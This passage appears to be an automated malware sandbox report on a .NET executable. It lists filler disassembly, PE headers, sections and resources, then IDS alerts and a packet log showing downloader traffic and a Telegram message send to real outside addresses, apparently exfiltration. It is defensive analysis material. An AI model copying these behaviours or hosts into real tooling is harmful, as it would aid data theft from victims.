                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb2d840x57.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x171e0.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xc84000x2f40
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xb0de40xb0e00fdd0a855a02b8d74d42fbd62a5e936e6False0.5713159783568904DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 172405433391196340124651232428032.0000006.762115344946815IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xb40000x171e00x172005deae21a568a2385b9b547572b6f6ff5False0.4616765202702703data5.447090938389051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xcc0000xc0x2004c1e57cc09931424ddbaf77420e6c273False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0xb44180x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5815602836879432
                                                                                                            RT_ICON0xb48800x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.3599726775956284
                                                                                                            RT_ICON0xb59a80x2668Device independent bitmap graphic, 48 x 96 x 32, image size 97920.2635272579332791
                                                                                                            RT_ICON0xb80100x4428Device independent bitmap graphic, 64 x 128 x 32, image size 174080.2042067858780376
                                                                                                            RT_ICON0xbc4380x5dbbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9954573869556158
                                                                                                            RT_ICON0xc21f40x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5815602836879432
                                                                                                            RT_ICON0xc265c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5948581560283688
                                                                                                            RT_ICON0xc2ac40x9b8Device independent bitmap graphic, 24 x 48 x 32, image size 24480.4204180064308682
                                                                                                            RT_ICON0xc347c0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.32308743169398907
                                                                                                            RT_ICON0xc45a40x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.14412568306010928
                                                                                                            RT_ICON0xc56cc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.19060283687943264
                                                                                                            RT_ICON0xc5b340x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.11429872495446267
                                                                                                            RT_ICON0xc6c5c0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 97920.07211147274206672
                                                                                                            RT_ICON0xc92c40x1952PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.7099660598580685
                                                                                                            RT_GROUP_ICON0xcac180x3edata0.8709677419354839
                                                                                                            RT_GROUP_ICON0xcac580x4cdata0.8289473684210527
                                                                                                            RT_GROUP_ICON0xcaca40x14data1.25
                                                                                                            RT_GROUP_ICON0xcacb80x30data0.9583333333333334
                                                                                                            RT_GROUP_ICON0xcace80x14data1.2
                                                                                                            RT_VERSION0xcacfc0x4e4dataEnglishUnited States0.4169329073482428

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Possible Origin

                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-11T06:49:54.998464+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749974158.101.44.24280TCP
                                                                                                            2025-01-11T06:49:56.108675+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749974158.101.44.24280TCP
                                                                                                            2025-01-11T06:49:56.699912+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749976104.21.64.1443TCP
                                                                                                            2025-01-11T06:49:57.373425+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749978158.101.44.24280TCP
                                                                                                            2025-01-11T06:49:58.560996+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749980158.101.44.24280TCP
                                                                                                            2025-01-11T06:50:00.340945+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749983104.21.64.1443TCP
                                                                                                            2025-01-11T06:50:24.253611+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749987104.21.64.1443TCP
                                                                                                            2025-01-11T06:50:32.505128+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749991104.21.64.1443TCP
                                                                                                            2025-01-11T06:50:33.465505+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749992149.154.167.220443TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 11, 2025 06:49:54.199107885 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:54.204050064 CET8049974158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:54.204138994 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:54.205626011 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:54.210403919 CET8049974158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:54.782908916 CET8049974158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:54.787698984 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:54.792571068 CET8049974158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:54.945127010 CET8049974158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:54.995460033 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:54.995564938 CET44349975104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:54.995656967 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:54.998464108 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:55.096153975 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:55.096191883 CET44349975104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:55.568866968 CET44349975104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:55.569150925 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:55.636881113 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:55.636924028 CET44349975104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:55.638046980 CET44349975104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:55.678189993 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:55.771220922 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:55.811342955 CET44349975104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:55.879914999 CET44349975104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:55.879976034 CET44349975104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:55.880152941 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:55.887653112 CET49975443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:55.891335011 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:55.896234989 CET8049974158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.049045086 CET8049974158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.067315102 CET49976443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:56.067369938 CET44349976104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.067456007 CET49976443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:56.067799091 CET49976443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:56.067835093 CET44349976104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.108675003 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:56.549272060 CET44349976104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.551676989 CET49976443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:56.551762104 CET44349976104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.699934006 CET44349976104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.700001955 CET44349976104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.700058937 CET49976443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:56.700478077 CET49976443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:56.704144955 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:56.705507040 CET4997880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:56.709091902 CET8049974158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.709156990 CET4997480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:56.710319996 CET8049978158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:56.710397005 CET4997880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:56.710499048 CET4997880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:56.715250969 CET8049978158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.322055101 CET8049978158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.323563099 CET49979443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:57.323618889 CET44349979104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.323697090 CET49979443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:57.324034929 CET49979443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:57.324048996 CET44349979104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.373425007 CET4997880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:57.786822081 CET44349979104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.788521051 CET49979443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:57.788554907 CET44349979104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.919061899 CET44349979104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.919142008 CET44349979104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.919279099 CET49979443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:57.919960976 CET49979443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:57.923274994 CET4997880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:57.924391985 CET4998080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:57.928301096 CET8049978158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.929272890 CET8049980158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:57.929361105 CET4997880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:57.929399967 CET4998080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:57.929539919 CET4998080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:57.934271097 CET8049980158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:58.510333061 CET8049980158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:58.511558056 CET49981443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:58.511607885 CET44349981104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:58.511672974 CET49981443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:58.511926889 CET49981443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:58.511936903 CET44349981104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:58.560996056 CET4998080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:58.965941906 CET44349981104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:58.967843056 CET49981443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:58.967889071 CET44349981104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:59.121654034 CET44349981104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:59.121722937 CET44349981104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:59.121794939 CET49981443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:59.122303009 CET49981443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:59.126741886 CET4998280192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:59.131690979 CET8049982158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:59.131815910 CET4998280192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:59.131913900 CET4998280192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:49:59.136781931 CET8049982158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:59.696301937 CET8049982158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:49:59.697488070 CET49983443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:59.697556973 CET44349983104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:59.697617054 CET49983443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:59.697952986 CET49983443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:49:59.697962999 CET44349983104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:59.748461962 CET4998280192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:00.182477951 CET44349983104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:00.184051037 CET49983443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:00.184077978 CET44349983104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:00.341037035 CET44349983104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:00.341196060 CET44349983104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:00.341368914 CET49983443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:00.341631889 CET49983443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:00.344856024 CET4998280192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:00.346064091 CET4998480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:00.349998951 CET8049982158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:00.350071907 CET4998280192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:00.350955963 CET8049984158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:00.351027012 CET4998480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:00.351129055 CET4998480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:00.355923891 CET8049984158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.095999956 CET8049984158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.097882032 CET49985443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:06.097934008 CET44349985104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.098037958 CET49985443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:06.098386049 CET49985443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:06.098411083 CET44349985104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.139143944 CET4998480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.575762033 CET44349985104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.577444077 CET49985443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:06.577465057 CET44349985104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.702199936 CET44349985104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.702287912 CET44349985104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.702385902 CET49985443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:06.702819109 CET49985443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:06.706403017 CET4998480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.707181931 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.711625099 CET8049984158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.711711884 CET4998480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.712029934 CET8049986158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.712110043 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.712234974 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.717068911 CET8049986158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:23.606889009 CET8049986158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:23.622778893 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:23.622834921 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:23.623037100 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:23.623332977 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:23.623343945 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:23.654833078 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.079447031 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.123502016 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:24.142951012 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:24.142966986 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.253669977 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.253830910 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.253956079 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:24.304521084 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:24.355927944 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.361183882 CET8049986158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.361249924 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.361951113 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.366887093 CET8049988158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.366959095 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.367142916 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.371963978 CET8049988158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.448599100 CET8049988158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.453113079 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:28.453177929 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.453339100 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:28.453819036 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:28.453833103 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.498608112 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:28.927508116 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.929816008 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:28.929855108 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.069497108 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.069578886 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.069638014 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:29.075918913 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:29.080271959 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.081559896 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.085367918 CET8049988158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.085450888 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.086467981 CET8049990158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.086549044 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.086675882 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.091489077 CET8049990158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:31.883913994 CET8049990158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:31.885641098 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:31.885689020 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:31.885755062 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:31.886112928 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:31.886123896 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:31.936036110 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:32.362181902 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.364933968 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:32.364979982 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.505136967 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.505235910 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.505321980 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:32.506017923 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:32.566646099 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:32.571713924 CET8049990158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.571780920 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:32.574101925 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:32.574167967 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.574245930 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:32.574925900 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:32.574953079 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.183535099 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.183743000 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:33.185882092 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:33.185916901 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.186228991 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.187875032 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:33.231343031 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.465497971 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.465578079 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.465704918 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:33.471218109 CET49992443192.168.2.7149.154.167.220
